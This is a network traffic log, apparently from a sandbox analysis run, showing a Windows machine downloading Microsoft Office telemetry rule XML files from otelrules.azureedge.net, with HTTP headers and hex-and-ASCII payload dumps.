Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.6	49830	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:14 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:14 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:14 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: d5b120ed-d01e-0017-3f65-3bb035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085414Z-178bfbc474bmqmgjhC1NYCy16c00000001c0000000003ek1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:14 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.6	49831	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:14 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:15 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:14 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 18e5e448-501e-000a-7b67-3b0180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085414Z-178bfbc474bkvpdnhC1NYCuu2w00000001b00000000067we x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:15 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.6	49832	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:14 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:15 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:15 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085415Z-1777c6cb754rz2pghC1TEBghen0000000as00000000097pb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:15 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.6	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:15 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:15 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:15 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085415Z-178bfbc474bpnd5vhC1NYC4vr4000000017g000000006s05 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:15 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.6	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:15 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:15 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:15 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 0c594107-601e-0032-67a5-3beebb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085415Z-r1d97b99577lxltfhC1TEByw2s0000000a4000000000apq5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:15 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.6	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:16 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:17 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:17 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 8176cca2-201e-0003-2c64-3bf85a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085417Z-178bfbc474btrnf9hC1NYCb80g00000001d0000000007d3b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:17 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.6	49836	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:16 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:17 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:17 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 848b8d5b-d01e-00a1-7163-3b35b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085417Z-178bfbc474bpnd5vhC1NYC4vr4000000013g00000000g50m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:17 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.6	49837	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:17 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:17 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:17 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 6a1e2df9-c01e-008d-338c-3a2eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085417Z-1777c6cb754ww792hC1TEBzqu40000000at0000000002s76 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:17 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.6	49838	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:17 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:17 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:17 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 6b01426f-c01e-0066-3d9a-3ba1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085417Z-r1d97b99577656nchC1TEBk98c0000000a2g00000000dd09 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:17 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.6	49839	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:17 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:17 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:17 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: fa7019cc-d01e-0017-4ba1-3bb035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085417Z-r1d97b99577lxltfhC1TEByw2s0000000a8g000000001c93 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:17 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.6	49840	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:19 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:19 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:19 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085419Z-178bfbc474b9xljthC1NYCtw94000000013000000000bedc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:54:19 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.6	49841	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:19 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:19 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:19 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 82acda03-501e-00a0-6aa6-3b9d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085419Z-r1d97b99577hc74hhC1TEBvbns00000009y000000000af02 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:19 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" 